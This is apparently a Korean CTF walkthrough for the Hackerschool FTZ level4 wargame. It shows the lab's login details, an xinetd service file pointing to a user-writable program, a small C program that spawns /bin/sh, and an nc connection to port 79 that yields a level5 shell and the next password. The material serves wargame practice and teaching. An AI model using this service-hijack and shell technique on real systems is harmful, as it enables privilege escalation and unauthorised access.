Hackerschool FTZ level4

Category : System hacking

ssh://ftz.hackerschool.org id : level4 pw : suck my brain

Summary : xinetd backdoor



서버에 접속하여 디렉토리에 있는 파일들을 확인한다.

[level4@ftz level4]$ ls -l 합계 12 -rw-r--r--    1 root     root           50  2월 24  2002 hint drwxr-xr-x    2 root     level4       4096  2월 24  2002 public_html drwxrwxr-x    2 root     level4       4096  7월 12 02:40 tmp [level4@ftz level4]$ cat hint 누군가 /etc/xinetd.d/에 백도어를 심어놓았다.!

/etc/xinetd.d/ 에 백도어가 있다고 하니 우선 해당디렉토리로 이동해본다.

[level4@ftz level4]$ cd /etc/xinetd.d/ [level4@ftz xinetd.d]$ ls backdoor     cups-lpd     echo      ntalk   rsh      services  telnet chargen      daytime      echo-udp  rexec   rsync    sgi_fam   time chargen-udp  daytime-udp  finger    rlogin  servers  talk      time-udp

엄청나게 backdoor처럼 보이는 서비스 파일이 있다.
backdoor라는 파일의 내용을 살펴본다.

[level4@ftz xinetd.d]$ cat backdoor service finger {  disable = no  flags  = REUSE  socket_type = stream         wait  = no  user  = level5  server  = /home/level4/tmp/backdoor  log_on_failure += USERID } [level4@ftz xinetd.d]$ cat /etc/services | grep finger finger  79/tcp finger  79/udp cfinger  2003/tcp   # GNU Finger

finger서비스를 정의하는 파일이다. level5 user의 권한으로 server 프로그램을 실행한다. (확인해보니 기존의 finger service는 disable 되어있다.) finger service는 79를 사용하고 있다.
server 프로그램이 위치한 곳은 level4 user의 홈디렉토리의 하위디렉토리인 tmp 이기 때문에  backdoor라는 프로그램을 작성하여 level5 user의 권한으로 원하는 명령을 수행할 수 있다.

~/tmp에 /bin/sh를 실행하는 backdoor라는 이름의 프로그램을 작성한다.

[level4@ftz tmp]$ cd ~/tmp [level4@ftz tmp]$ cat backdoor.c #include <stdio.h> int main() {  execl("/bin/sh" , "sh" , NULL); } [level4@ftz tmp]$ gcc -o backdoor backdoor.c

이제 /etc/service에서 확인했던 finger service가 사용하는 port 인 79번 port에 접속하면 방금 작성한 backdoor프로그램이 실행되어 level5 user의 쉘을 얻게된다.

[pwn3r@localhost ~]$ nc ftz.hackerschool.org 79  id uid=3005(level5) gid=3005(level5) my-pass Level5 Password is "what is your name?".

level5 user의 쉘을 획득하고 패스워드를 얻었다.